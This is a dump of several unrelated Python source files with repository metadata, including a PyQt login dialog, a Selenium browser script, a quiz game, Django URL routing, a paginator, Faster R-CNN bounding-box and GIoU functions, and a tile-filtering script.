self.lineEdit_2.setFont(font)
self.lineEdit_2.setStyleSheet("background-color: transparent;\n"
"color: rgb(255, 255, 255);")
self.lineEdit_2.setObjectName("lineEdit_2")
class Dialog(QtWidgets.QDialog, Ui_Dialog):
def __init__(self, parent=None):
QtWidgets.QDialog.__init__(self, parent)
self.setupUi(self)
# self.pushButton.pressed.connect(self.textEdit.clear)
# self.pushButton.pressed.connect(self.sejd)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
self.keyworddict = {}
self.count = {}
MainWindow.setObjectName("MainWindow")
MainWindow.resize(803, 538)
MainWindow.setMinimumSize(QtCore.QSize(0, 0))
MainWindow.setMaximumSize(QtCore.QSize(10000, 10000))
self.centralWidget = QtWidgets.QWidget(MainWindow)
self.centralWidget.setObjectName("centralWidget")
self.pushButton = QtWidgets.QPushButton(self.centralWidget)
self.pushButton.setGeometry(QtCore.QRect(180, 210, 75, 23))
font = QtGui.QFont()
font.setFamily("Yu Gothic")
font.setBold(True)
font.setWeight(75)
self.pushButton.setFont(font)
self.pushButton.setObjectName("pushButton")
MainWindow.setCentralWidget(self.centralWidget)
class MainWindow(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
QtWidgets.QMainWindow.__init__(self, parent)
self.setupUi(self)
self.pushButton.pressed.connect(self.on_Button_clicked)
def on_Button_clicked(self):
dialog = QtWidgets.QDialog()
dialog.ui = Ui_Dialog()
dialog.ui.setupUi(dialog)
# connect signal to slot
dialog.ui.lineEdit_2.textChanged.connect(self.dialogTextChanged)
dialog.setWindowTitle("Login")
# dialog.setAttribute(QtCore.Qt.WA_DeleteOnClose)
dialog.exec_()
if dialog.exec_() == QtWidgets.QDialog.Accepted:
text = dialog.ui.lineEdit_2.text()
# print(dialog.ui.lineEdit_2.text())
dialog.deleteLater()
def dialogTextChanged(self, text):
print(text)
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
w = MainWindow()
w.setWindowTitle("ui")
w.show()
sys.exit(app.exec_())
|
[
"taxkmj@naver.com"
] |
taxkmj@naver.com
|
b019e080a9babb4832dee148b2d43232ad3da0b4
|
7682f822e5d19ee2ecd502e41bc49f550cbf6e8f
|
/SeleniumBasics/loginException/google.py
|
5590dcfd2f3f883915145d2aa94e7528cdff2eab
|
[] |
no_license
|
Swtbgvi/SeleniumBasics
|
325ff9a78c8d92fb8c389cc7a6a6df108e33e898
|
db7714b9053d97ffa79fe2f00342d9cc84667fea
|
refs/heads/master
| 2020-05-03T16:09:00.571126
| 2019-05-11T11:46:07
| 2019-05-11T11:46:07
| 177,285,887
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 492
|
py
|
from selenium import webdriver
# driver = webdriver.(executable_path="C:\\Users\\ss035878\\Downloads\\geckodriver-v0.24.0-win64")
# driver.get("https://www.google.com/")
# driver = webdriver.Firefox(executable_path="C:\\Users\\ss035878\\Downloads\\geckodriver-v0.24.0-win64\\\\\\geckodriver.exe")
# driver.get("https://www.google.com/")
driver = webdriver.Ie(executable_path="C:\\Users\\ss035878\\Downloads\\IEDriverServer_x64_3.14.0\\IEDriverServer.exe")
driver.get("https://google.com")
|
[
"Swetha.S@Cerner.com"
] |
Swetha.S@Cerner.com
|
62497a6c4d51625ede2c029c09648ecc58cd77fc
|
dea3132777935c321973e2ec0af47aa3cbf1f191
|
/09 Bayesian Networks/venv/Scripts/pip3.8-script.py
|
0e3dcc7d40f6d6347acbff9ae3f9632fc37502cb
|
[] |
no_license
|
SBangslund/SE04_AI
|
c14a11b1db0bbf8fd642b289d6ecdd6256dbb48f
|
7a2f5ac41e7b25b4b10a4033d2c940a79d1fd0ff
|
refs/heads/master
| 2022-05-09T06:10:07.110424
| 2020-04-30T14:39:12
| 2020-04-30T14:39:12
| 247,294,833
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 475
|
py
|
#!"D:\SB\OneDrive\SDU\Software Engineering\03 Courses\4. AI (Artificial Intelligence)\Exercise_07\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
)
|
[
"s.bangslund@hotmail.dk"
] |
s.bangslund@hotmail.dk
|
f884e19aeddc03800852b567b370b7657aacfbd2
|
92322d778ce7de12f8729b1838e5e5fc9b6d69d0
|
/kbc_3.py
|
e3914b6f69b5eab7751aed80cb0b9ded8ba4d8a4
|
[] |
no_license
|
kabitakumari20/List_Questions
|
426e2816db37583309e499d42f8706de404bb4e7
|
849b23bd73f470f5ee23a03bfb4f09b772b224cf
|
refs/heads/main
| 2023-04-04T10:07:39.950157
| 2021-04-15T15:47:02
| 2021-04-15T15:47:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
questions_list=[["1.how many continenets are there?"],["2.what is capital of india?"],["ng m kon sa course hota h?"]]
options_list=[["1.four","2.nine","3.seven","4.eight"],["1.chandigarh","2.bhopal","3.chennai","4.delhi"],["1.software","2.counselling","3.tourism","4.agriculture"]]
solutions_list=[3,4,1]
lifeline_key=[["1.four","3.seven"],["1.chandigarh","4.delhi"],["1.software","2.counselling"]]
print("there is one lifeline key if you want you can use it by entering 5050")
c=0
i=0
while i<len(questions_list):
print(questions_list[i])
j=0
while j<len(options_list[i]):
print(options_list[i][j])
j=j+1
user=int(input("any number="))
if user==solutions_list[i]:
print("congress")
elif user==5050:
if c==0:
print(lifeline_key[i])
c=c+1
user1=int(input("any number="))
if user1==solutions_list[i]:
print("congrets")
else:
print("sadly")
else:
print("you used lifeline key, so please enter your answer")
user2=int(input("any number="))
if user2==solutions_list[i]:
print("your answer is correct")
else:
print("your answer is wrong")
else:
print("oops,your answer is wrong")
print("quite")
i=i+1
|
[
"kabita20@navgurukul.org"
] |
kabita20@navgurukul.org
|
1ec88640264888f044176603e9b77661bd321de8
|
bd9aed3c36d4e94d12314bc661d5f96cc55adf13
|
/mysite/polls/urls.py
|
afbf5d6cf0444399acfe015589caecd1d335515b
|
[] |
no_license
|
merry-hyelyn/Django_Tutorial
|
cf0a16f91993c8dddbe8c9464e44fec6e5f4168b
|
5dc7444fc77761f46ed31ba1489ab99ea8df3ed9
|
refs/heads/master
| 2022-09-12T14:35:29.685829
| 2020-05-30T14:12:38
| 2020-05-30T14:12:38
| 266,798,461
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
from django.urls import path
from . import views
app_name = 'polls'
urlpatterns = [
path('', views.IndexView.as_view(), name='index'),
path('<int:pk>/', views.DetialView.as_view(), name='detail'),
path('<int:pk>/results/', views.ResultVeiw.as_view(), name='results'),
path('<int:question_id>/vote/', views.vote, name='vote'),
]
|
[
"h1335@naver.com"
] |
h1335@naver.com
|
d4e32da54313c1944fb42ed8d569176df9d1148e
|
46f369e2fa03b44ebb0206532d6be92fb79c31e5
|
/util/util.py
|
62e48f17270d1e0bd9f5d4811131ade543f0f026
|
[
"MIT"
] |
permissive
|
w3eee/issue-task
|
944f438c41bb94ab0bb4a35929ba38c8b3ce843e
|
54fe9837d65a8a04fe6fb3b0eeced52fcb696ad3
|
refs/heads/master
| 2022-01-17T09:12:11.049332
| 2019-01-09T02:54:25
| 2019-01-09T02:54:25
| 17,831,031
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,240
|
py
|
# coding: utf8
import datetime
class Paginator(object):
    """Simple sliding-window paginator.

    page:     current page number (1-based)
    num:      total number of items; converted to a page count in __init__
    per_page: items per page (defaults to _per_page when omitted)
    """

    _per_page = 15  # default page size
    _pi = 5         # width of the page-number window around the current page

    def __init__(self, page, num, per_page=None):
        """page: 当前页
           num: 数量
           per_page: 每一页数量
        """
        page = int(page)
        self.per_page = per_page or self._per_page
        # Total page count = ceil(num / per_page), in pure integer math.
        # Fixes two defects of the original:
        #  - it divided by the raw `per_page` argument, so calling
        #    Paginator(page, num) without per_page raised TypeError
        #    (division by None) instead of using the default;
        #  - the float-based ceil round-trip is replaced by the exact
        #    integer identity (n + d - 1) // d.
        self.num = (num + self.per_page - 1) // self.per_page
        self.page = page

    @property
    def pages(self):
        """List of page numbers to display, centered on the current page
        and clipped to [1, self.num]."""
        # Floor division keeps prange an int on Python 3 as well
        # (the original `/` produced a float there and broke range()).
        prange = self._pi // 2
        first = self.page - prange
        last = self.page + prange
        # Shift the window right if it underflows page 1 ...
        if first < 1:
            last += 1 - first
            first = 1
        # ... then left if it overflows the last page ...
        if last > self.num:
            first -= last - self.num
            last = self.num
        # ... and re-clip in case the shift pushed first below 1 again.
        if first < 1:
            first = 1
        return [i for i in range(first, last + 1)]

    @property
    def prev(self):
        """Previous page number, or None when already on the first page."""
        prev = self.page - 1
        return prev if prev > 0 else None

    @property
    def next(self):
        """Next page number, or None when already on the last page."""
        next = self.page + 1
        return None if next > self.num else next
def date_to_str(d, format='%Y-%m-%d %H:%M:%S'):
    """Format a datetime as a string using *format*; any other value
    (None, str, date, ...) is passed through unchanged."""
    if d and isinstance(d, datetime.datetime):
        return d.strftime(format)
    return d
|
[
"gee@gee-ThinkPad-X200.(none)"
] |
gee@gee-ThinkPad-X200.(none)
|
b2cb9eed251f6fe7492541c21a4ee7a6a3bf1b34
|
df955822c4c0537e4937939bc20e11cb27af3394
|
/lib/model/rpn/bbox_transform_giou.py
|
917a1cce9656c4c64c8c378da1491074f68b68ba
|
[] |
no_license
|
only-someone/ML_BigWork
|
be29dbd6ee3c14417f3bb6efb8f5e1a3be0fdd66
|
da58cd33cc3b93b857cddfec24c28e074408d0c8
|
refs/heads/master
| 2020-09-07T19:38:38.942707
| 2019-11-11T14:51:04
| 2019-11-11T14:51:04
| 220,891,801
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,445
|
py
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
# --------------------------------------------------------
# Reorganized and modified by Jianwei Yang and Jiasen Lu
# --------------------------------------------------------
import torch
import numpy as np
import pdb
def bbox_transform(ex_rois, gt_rois):
    """Encode ground-truth boxes as (dx, dy, dw, dh) regression targets
    relative to the example (anchor/proposal) boxes.

    ex_rois, gt_rois: (N, 4) tensors of [x1, y1, x2, y2] corners.
    Returns an (N, 4) tensor of targets.
    """
    # Convert both corner-format box sets to center/size form
    # (the +1.0 follows the pixel-inclusive box convention used here).
    ex_w = ex_rois[:, 2] - ex_rois[:, 0] + 1.0
    ex_h = ex_rois[:, 3] - ex_rois[:, 1] + 1.0
    ex_cx = ex_rois[:, 0] + 0.5 * ex_w
    ex_cy = ex_rois[:, 1] + 0.5 * ex_h

    gt_w = gt_rois[:, 2] - gt_rois[:, 0] + 1.0
    gt_h = gt_rois[:, 3] - gt_rois[:, 1] + 1.0
    gt_cx = gt_rois[:, 0] + 0.5 * gt_w
    gt_cy = gt_rois[:, 1] + 0.5 * gt_h

    # Center offsets normalized by the example box size; size ratios in
    # log space.
    return torch.stack(
        (
            (gt_cx - ex_cx) / ex_w,
            (gt_cy - ex_cy) / ex_h,
            torch.log(gt_w / ex_w),
            torch.log(gt_h / ex_h),
        ),
        1,
    )
def bbox_transform_batch(ex_rois, gt_rois):
    """Batched bbox_transform: encode ground-truth boxes as
    (dx, dy, dw, dh) regression targets relative to the example boxes.

    ex_rois: (N, 4) shared across the whole batch, or (b, N, 4) per image.
    gt_rois: (b, N, 4+) ground-truth boxes.
    Returns a (b, N, 4) tensor of targets.
    """
    if ex_rois.dim() == 2:
        # One shared set of example boxes, broadcast over the batch.
        ex_widths = ex_rois[:, 2] - ex_rois[:, 0] + 1.0
        ex_heights = ex_rois[:, 3] - ex_rois[:, 1] + 1.0
        ex_ctr_x = ex_rois[:, 0] + 0.5 * ex_widths
        ex_ctr_y = ex_rois[:, 1] + 0.5 * ex_heights

        gt_widths = gt_rois[:, :, 2] - gt_rois[:, :, 0] + 1.0
        gt_heights = gt_rois[:, :, 3] - gt_rois[:, :, 1] + 1.0
        gt_ctr_x = gt_rois[:, :, 0] + 0.5 * gt_widths
        gt_ctr_y = gt_rois[:, :, 1] + 0.5 * gt_heights

        # view(1,-1).expand_as(...) broadcasts the shared anchors to (b, N).
        targets_dx = (gt_ctr_x - ex_ctr_x.view(1,-1).expand_as(gt_ctr_x)) / ex_widths
        targets_dy = (gt_ctr_y - ex_ctr_y.view(1,-1).expand_as(gt_ctr_y)) / ex_heights
        targets_dw = torch.log(gt_widths / ex_widths.view(1,-1).expand_as(gt_widths))
        targets_dh = torch.log(gt_heights / ex_heights.view(1,-1).expand_as(gt_heights))

    elif ex_rois.dim() == 3:
        # Per-image example boxes: plain elementwise computation.
        ex_widths = ex_rois[:, :, 2] - ex_rois[:, :, 0] + 1.0
        ex_heights = ex_rois[:,:, 3] - ex_rois[:,:, 1] + 1.0
        ex_ctr_x = ex_rois[:, :, 0] + 0.5 * ex_widths
        ex_ctr_y = ex_rois[:, :, 1] + 0.5 * ex_heights

        gt_widths = gt_rois[:, :, 2] - gt_rois[:, :, 0] + 1.0
        gt_heights = gt_rois[:, :, 3] - gt_rois[:, :, 1] + 1.0
        gt_ctr_x = gt_rois[:, :, 0] + 0.5 * gt_widths
        gt_ctr_y = gt_rois[:, :, 1] + 0.5 * gt_heights

        targets_dx = (gt_ctr_x - ex_ctr_x) / ex_widths
        targets_dy = (gt_ctr_y - ex_ctr_y) / ex_heights
        targets_dw = torch.log(gt_widths / ex_widths)
        targets_dh = torch.log(gt_heights / ex_heights)
    else:
        raise ValueError('ex_roi input dimension is not correct.')

    targets = torch.stack(
        (targets_dx, targets_dy, targets_dw, targets_dh),2)

    return targets
def bbox_transform_inv(boxes, deltas, batch_size):
    """Decode predicted (dx, dy, dw, dh) deltas back into corner-format
    boxes (the inverse of bbox_transform).

    boxes:  (b, N, 4) reference boxes [x1, y1, x2, y2].
    deltas: (b, N, 4k) predictions, k per-class delta groups interleaved
            every 4 channels.
    Returns the decoded (b, N, 4k) boxes.
    NOTE(review): `batch_size` is unused in the body.
    """
    widths = boxes[:, :, 2] - boxes[:, :, 0] + 1.0
    heights = boxes[:, :, 3] - boxes[:, :, 1] + 1.0
    ctr_x = boxes[:, :, 0] + 0.5 * widths
    ctr_y = boxes[:, :, 1] + 0.5 * heights

    # Every 4th channel starting at 0/1/2/3: per-class delta components.
    dx = deltas[:, :, 0::4]
    dy = deltas[:, :, 1::4]
    dw = deltas[:, :, 2::4]
    dh = deltas[:, :, 3::4]

    # Invert the encoding: shift centers, exponentiate the log-scales.
    pred_ctr_x = dx * widths.unsqueeze(2) + ctr_x.unsqueeze(2)
    pred_ctr_y = dy * heights.unsqueeze(2) + ctr_y.unsqueeze(2)
    pred_w = torch.exp(dw) * widths.unsqueeze(2)
    pred_h = torch.exp(dh) * heights.unsqueeze(2)

    # clone() keeps dtype/device/shape and is overwritten channel-wise.
    pred_boxes = deltas.clone()
    # x1
    pred_boxes[:, :, 0::4] = pred_ctr_x - 0.5 * pred_w
    # y1
    pred_boxes[:, :, 1::4] = pred_ctr_y - 0.5 * pred_h
    # x2
    pred_boxes[:, :, 2::4] = pred_ctr_x + 0.5 * pred_w
    # y2
    pred_boxes[:, :, 3::4] = pred_ctr_y + 0.5 * pred_h

    return pred_boxes
def clip_boxes_batch(boxes, im_shape, batch_size):
    """
    Clip boxes to image boundaries.

    boxes: (b, N, 4) [x1, y1, x2, y2]; im_shape rows are (height, width).
    Clamps in place and returns `boxes`.
    NOTE(review): `batch_size` and `num_rois` are unused in the body, and
    the per-row clamp uses the whole im_shape column rather than a
    per-image value — confirm all images in a batch share one shape.
    """
    num_rois = boxes.size(1)

    # Clamp all negative coordinates up to 0 in place.
    boxes[boxes < 0] = 0

    # batch_x = (im_shape[:,0]-1).view(batch_size, 1).expand(batch_size, num_rois)
    # batch_y = (im_shape[:,1]-1).view(batch_size, 1).expand(batch_size, num_rois)
    batch_x = im_shape[:, 1] - 1  # max valid x (width - 1)
    batch_y = im_shape[:, 0] - 1  # max valid y (height - 1)

    boxes[:,:,0][boxes[:,:,0] > batch_x] = batch_x
    boxes[:,:,1][boxes[:,:,1] > batch_y] = batch_y
    boxes[:,:,2][boxes[:,:,2] > batch_x] = batch_x
    boxes[:,:,3][boxes[:,:,3] > batch_y] = batch_y

    return boxes
def clip_boxes(boxes, im_shape, batch_size):
    """Clamp boxes to lie inside each image, in place, and return them.

    boxes:    (batch, N, 4k) tensor of [x1, y1, x2, y2, ...] coordinates.
    im_shape: (batch, 2) tensor of (height, width) per image.
    """
    for b in range(batch_size):
        max_x = im_shape[b, 1] - 1  # width  - 1
        max_y = im_shape[b, 0] - 1  # height - 1
        # x coordinates live in channels 0 and 2 of every 4-tuple,
        # y coordinates in channels 1 and 3.
        boxes[b, :, 0::4].clamp_(0, max_x)
        boxes[b, :, 2::4].clamp_(0, max_x)
        boxes[b, :, 1::4].clamp_(0, max_y)
        boxes[b, :, 3::4].clamp_(0, max_y)
    return boxes
def bbox_overlaps(anchors, gt_boxes):
    """
    anchors: (N, 4) ndarray of float
    gt_boxes: (K, 4) ndarray of float
    overlaps: (N, K) ndarray of overlap between boxes and query_boxes

    Computes a GIoU-style score for every (anchor, gt) pair:
    IoU - (enclosing_area - union_area) / enclosing_area.
    """
    N = anchors.size(0)
    K = gt_boxes.size(0)

    # Per-box areas (pixel-inclusive convention, hence the +1).
    gt_boxes_area = ((gt_boxes[:,2] - gt_boxes[:,0] + 1) *
                (gt_boxes[:,3] - gt_boxes[:,1] + 1)).view(1, K)

    anchors_area = ((anchors[:,2] - anchors[:,0] + 1) *
                (anchors[:,3] - anchors[:,1] + 1)).view(N, 1)

    # Broadcast both sets to (N, K, 4) for pairwise computation.
    boxes = anchors.view(N, 1, 4).expand(N, K, 4)
    query_boxes = gt_boxes.view(1, K, 4).expand(N, K, 4)

    # Intersection width/height, clamped to 0 when the pair is disjoint.
    iw = (torch.min(boxes[:,:,2], query_boxes[:,:,2]) -
        torch.max(boxes[:,:,0], query_boxes[:,:,0]) + 1)
    iw[iw < 0] = 0

    ih = (torch.min(boxes[:,:,3], query_boxes[:,:,3]) -
        torch.max(boxes[:,:,1], query_boxes[:,:,1]) + 1)
    ih[ih < 0] = 0

    # Width/height of the smallest enclosing box of each pair.
    ow = (torch.max(boxes[:, :, 2], query_boxes[:, :, 2]) -
          torch.min(boxes[:, :, 0], query_boxes[:, :, 0]) + 1)
    # NOTE(review): iw was already clamped above, so `iw < 0` is always
    # False here and this line is a no-op — presumably the pre-clamp mask
    # was intended; confirm before changing the numerics.
    ow[iw < 0] = 0
    oh = (torch.max(boxes[:, :, 3], query_boxes[:, :, 3]) -
          torch.min(boxes[:, :, 1], query_boxes[:, :, 1]) + 1)
    oh[ih < 0] = 0

    ua = anchors_area + gt_boxes_area - (iw * ih)  # union area
    iou = iw * ih / ua
    oa=ow*oh                                       # enclosing-box area
    overlaps=iou-(oa-ua)/oa                        # GIoU

    return overlaps
def bbox_overlaps_batch(anchors, gt_boxes):
    """
    anchors: (N, 4) ndarray of float
    gt_boxes: (b, K, 5) ndarray of float
    overlaps: (N, K) ndarray of overlap between boxes and query_boxes

    Batched GIoU-style overlap: IoU - (enclosing - union) / enclosing,
    computed for every (anchor, gt) pair per batch element. Degenerate
    (1x1) gt boxes are masked to 0, degenerate anchors to -1.
    """
    batch_size = gt_boxes.size(0)

    if anchors.dim() == 2:
        # Shared anchors broadcast over the batch.
        N = anchors.size(0)
        K = gt_boxes.size(1)

        anchors = anchors.view(1, N, 4).expand(batch_size, N, 4).contiguous()
        gt_boxes = gt_boxes[:,:,:4].contiguous()

        gt_boxes_x = (gt_boxes[:,:,2] - gt_boxes[:,:,0] + 1)
        gt_boxes_y = (gt_boxes[:,:,3] - gt_boxes[:,:,1] + 1)
        gt_boxes_area = (gt_boxes_x * gt_boxes_y).view(batch_size, 1, K)

        anchors_boxes_x = (anchors[:,:,2] - anchors[:,:,0] + 1)
        anchors_boxes_y = (anchors[:,:,3] - anchors[:,:,1] + 1)
        anchors_area = (anchors_boxes_x * anchors_boxes_y).view(batch_size, N, 1)

        # Width == height == 1 marks padding/degenerate boxes.
        gt_area_zero = (gt_boxes_x == 1) & (gt_boxes_y == 1)
        anchors_area_zero = (anchors_boxes_x == 1) & (anchors_boxes_y == 1)

        boxes = anchors.view(batch_size, N, 1, 4).expand(batch_size, N, K, 4)
        query_boxes = gt_boxes.view(batch_size, 1, K, 4).expand(batch_size, N, K, 4)

        # Intersection width/height, clamped at 0 for disjoint pairs.
        iw = (torch.min(boxes[:,:,:,2], query_boxes[:,:,:,2]) -
            torch.max(boxes[:,:,:,0], query_boxes[:,:,:,0]) + 1)
        iw[iw < 0] = 0

        ih = (torch.min(boxes[:,:,:,3], query_boxes[:,:,:,3]) -
            torch.max(boxes[:,:,:,1], query_boxes[:,:,:,1]) + 1)
        ih[ih < 0] = 0

        # Smallest enclosing box per pair.
        ow = (torch.max(boxes[:, :, :, 2], query_boxes[:, :, :, 2]) -
              torch.min(boxes[:, :, :, 0], query_boxes[:, :, :, 0]) + 1)
        # NOTE(review): iw/ih were already clamped, so these two masked
        # assignments are no-ops — presumably the pre-clamp masks were
        # intended; confirm before changing the numerics.
        ow[iw < 0] = 0
        oh = (torch.max(boxes[:, :, :, 3], query_boxes[:, :, :, 3]) -
              torch.min(boxes[:, :, :, 1], query_boxes[:, :, :, 1]) + 1)
        oh[ih < 0] = 0

        ua = anchors_area + gt_boxes_area - (iw * ih)  # union area
        iou = iw * ih / ua
        oa = ow * oh                                   # enclosing-box area
        overlaps = iou - (oa - ua) / oa                # GIoU

        # mask the overlap here.
        overlaps.masked_fill_(gt_area_zero.view(batch_size, 1, K).expand(batch_size, N, K), 0)
        overlaps.masked_fill_(anchors_area_zero.view(batch_size, N, 1).expand(batch_size, N, K), -1)

    elif anchors.dim() == 3:
        # Per-image anchors; column 0 may be a batch index that is skipped.
        N = anchors.size(1)
        K = gt_boxes.size(1)

        if anchors.size(2) == 4:
            anchors = anchors[:,:,:4].contiguous()
        else:
            anchors = anchors[:,:,1:5].contiguous()

        gt_boxes = gt_boxes[:,:,:4].contiguous()

        gt_boxes_x = (gt_boxes[:,:,2] - gt_boxes[:,:,0] + 1)
        gt_boxes_y = (gt_boxes[:,:,3] - gt_boxes[:,:,1] + 1)
        gt_boxes_area = (gt_boxes_x * gt_boxes_y).view(batch_size, 1, K)

        anchors_boxes_x = (anchors[:,:,2] - anchors[:,:,0] + 1)
        anchors_boxes_y = (anchors[:,:,3] - anchors[:,:,1] + 1)
        anchors_area = (anchors_boxes_x * anchors_boxes_y).view(batch_size, N, 1)

        gt_area_zero = (gt_boxes_x == 1) & (gt_boxes_y == 1)
        anchors_area_zero = (anchors_boxes_x == 1) & (anchors_boxes_y == 1)

        boxes = anchors.view(batch_size, N, 1, 4).expand(batch_size, N, K, 4)
        query_boxes = gt_boxes.view(batch_size, 1, K, 4).expand(batch_size, N, K, 4)

        iw = (torch.min(boxes[:,:,:,2], query_boxes[:,:,:,2]) -
            torch.max(boxes[:,:,:,0], query_boxes[:,:,:,0]) + 1)
        iw[iw < 0] = 0

        ih = (torch.min(boxes[:,:,:,3], query_boxes[:,:,:,3]) -
            torch.max(boxes[:,:,:,1], query_boxes[:,:,:,1]) + 1)
        ih[ih < 0] = 0
        ow = (torch.max(boxes[:, :, :, 2], query_boxes[:, :, :, 2]) -
              torch.min(boxes[:, :, :, 0], query_boxes[:, :, :, 0]) + 1)
        ow[iw < 0] = 0
        oh = (torch.max(boxes[:, :, :, 3], query_boxes[:, :, :, 3]) -
              torch.min(boxes[:, :, :, 1], query_boxes[:, :, :, 1]) + 1)
        oh[ih < 0] = 0
        ua = anchors_area + gt_boxes_area - (iw * ih)

        # Intersection (iw * ih) divided by Union (ua)
        iou = iw * ih / ua
        oa = ow * oh
        overlaps = iou - (oa - ua) / oa

        # mask the overlap here.
        overlaps.masked_fill_(gt_area_zero.view(batch_size, 1, K).expand(batch_size, N, K), 0)
        overlaps.masked_fill_(anchors_area_zero.view(batch_size, N, 1).expand(batch_size, N, K), -1)
    else:
        raise ValueError('anchors input dimension is not correct.')

    return overlaps
|
[
"490072639@qq.com"
] |
490072639@qq.com
|
83e9ac3986ea298378407f690db477e7f8e2ffda
|
cea9c5c319e6c6f4a30ecb9f26601868fa616989
|
/5_2.py
|
14177832135ab63644b4239ab7c4e082388436db
|
[] |
no_license
|
hamiltonisbest/leetcode
|
ce82d34015373b859d52f3d4b0c805d17bc8d005
|
228560ccb956a05e56f39a39896182159b416ac8
|
refs/heads/master
| 2021-01-19T19:27:14.221596
| 2017-07-15T09:00:56
| 2017-07-15T09:00:56
| 88,419,261
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 760
|
py
|
class Solution(object):
    def longestPalindrome(self, s):
        """Longest palindromic substring via Manacher's algorithm, O(n).

        Python 2 code: uses `xrange` and integer `/` in the final slice.
        """
        # Transform "abc" -> ['$','#','a','#','b','#','c','#','?'] so odd-
        # and even-length palindromes are handled uniformly; '$' and '?'
        # are unequal sentinels that stop expansion without bounds checks.
        t = ['$', '#']
        for c in s:
            t.append(c)
            t.append('#')
        t.append('?')
        # farest: right edge of the rightmost palindrome found so far;
        # idx: its center; max_len/center: best palindrome seen.
        farest, idx, max_len, center = 0, 0, 0, 0
        p = [0] * len(t)  # p[i] = palindrome radius centered at t[i]
        for i in xrange(1, len(t) - 1):
            # Mirror trick: seed with the radius of i's mirror around idx,
            # capped by the window edge; otherwise start from 1.
            p[i] = min(p[2 * idx - i], farest - i) if farest > i else 1
            # Expand around i while the characters match.
            while t[i + p[i]] == t[i - p[i]]:
                p[i] += 1
            if farest < i + p[i]:
                farest = i + p[i]
                idx = i
            if max_len < p[i]:
                max_len = p[i]
                center = i
        # Map the transformed center/radius back to indices in s.
        return s[(center - max_len) / 2 : (center - max_len) / 2 + max_len - 1]
# Demo driver (Python 2 print statement).
solution = Solution()
print solution.longestPalindrome("babbb")
|
[
"hefubin@meituan.com"
] |
hefubin@meituan.com
|
12282492b324dc5fb815a1e908c1e257d7d835c8
|
154e563104144721865a90987db0332bef08a4c3
|
/old/filter_tiles.py
|
df21217c395d74d5e54fffb73b83175d0f3cffc5
|
[
"MIT"
] |
permissive
|
Rhoana/rh_aligner
|
565572d645769053c74a36ddf0f53ecc20d997fe
|
baab698f6520b9b999bccf423dc510b0c8f4b9bb
|
refs/heads/master
| 2021-01-01T05:29:25.406459
| 2016-05-09T15:34:58
| 2016-05-09T15:34:58
| 56,165,015
| 3
| 3
| null | 2016-05-05T20:00:26
| 2016-04-13T15:43:33
|
Python
|
UTF-8
|
Python
| false
| false
| 2,329
|
py
|
# Takes a json file that contains many tiles with their bounding boxes (Tile-Spec format)
# and a bounding box, and outputs a json file for each tile that is overlapping with the bounding box
import sys
import os
import argparse
import json
from bounding_box import BoundingBox
# common functions
def load_tiles(tiles_spec_fname, bbox):
    """Load the tile-spec json file and return the tiles whose bounding
    box overlaps *bbox* (a BoundingBox instance)."""
    with open(tiles_spec_fname, 'r') as data_file:
        all_tiles = json.load(data_file)
    # Keep only tiles overlapping the requested region.
    return [
        tile for tile in all_tiles
        if bbox.overlap(BoundingBox.fromList(tile['bbox']))
    ]
def filter_tiles(tiles_fname, out_fname, bbox):
    """Write a tile-spec json containing only the tiles from
    *tiles_fname* that overlap the bounding box given by the string
    *bbox* ("from_x to_x from_y to_y")."""
    # Parse the bounding-box string into a BoundingBox object.
    region = BoundingBox.fromStr(bbox)
    # Collect the tiles relevant to that region.
    kept = load_tiles(tiles_fname, region)
    # Emit a deterministic, human-readable tile-spec file.
    with open(out_fname, 'w') as outfile:
        json.dump(kept, outfile, sort_keys=True, indent=4)
def main():
    """Command-line entry point: parse arguments and run filter_tiles."""
    # Command line parser
    parser = argparse.ArgumentParser(description='Takes a json file that contains many tiles with their bounding boxes (Tile-Spec format)\
and a bounding box, and outputs a json file for each tile that is overlapping with the bounding box')
    parser.add_argument('tiles_fname', metavar='tiles_json', type=str,
                        help='a tile_spec file that contains all the images to be aligned in json format')
    parser.add_argument('-o', '--output_file', type=str,
                        help='an output tile_spec file, that will include only the relevant tiles (default: ./filtered.json)',
                        default='./filtered.json')
    # the default bounding box is as big as the image can be
    # (Python 2 code: sys.maxint does not exist on Python 3)
    parser.add_argument('-b', '--bounding_box', type=str,
                        help='the bounding box of the part of image that needs to be aligned format: "from_x to_x from_y to_y" (default: all tiles)',
                        default='{0} {1} {2} {3}'.format((-sys.maxint - 1), sys.maxint, (-sys.maxint - 1), sys.maxint))

    args = parser.parse_args()

    #print args
    filter_tiles(args.tiles_fname, args.output_file, args.bounding_box)

if __name__ == '__main__':
    main()
|
[
"adi.suissa@gmail.com"
] |
adi.suissa@gmail.com
|
cfa9e2a185a3da3b366a17ed07415144b6b77f5a
|
eb1332d3ee9fe70d5b6721cb83b9abdbd1114ac0
|
/article/views.py
|
a8c976b71705eef85b2eeffef904dbe7d191b3be
|
[] |
no_license
|
shreyasrk/articlerenderer
|
e6ab4ecdb9167bc39f66215f8266e1298ed9b024
|
f0b2424fb7c8d6024e92cbae66d65cf4edd5b146
|
refs/heads/master
| 2021-01-10T03:50:20.078967
| 2016-02-21T15:11:31
| 2016-02-21T15:11:31
| 52,163,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
from django.http import HttpResponse
from .models import Article
def index(request):
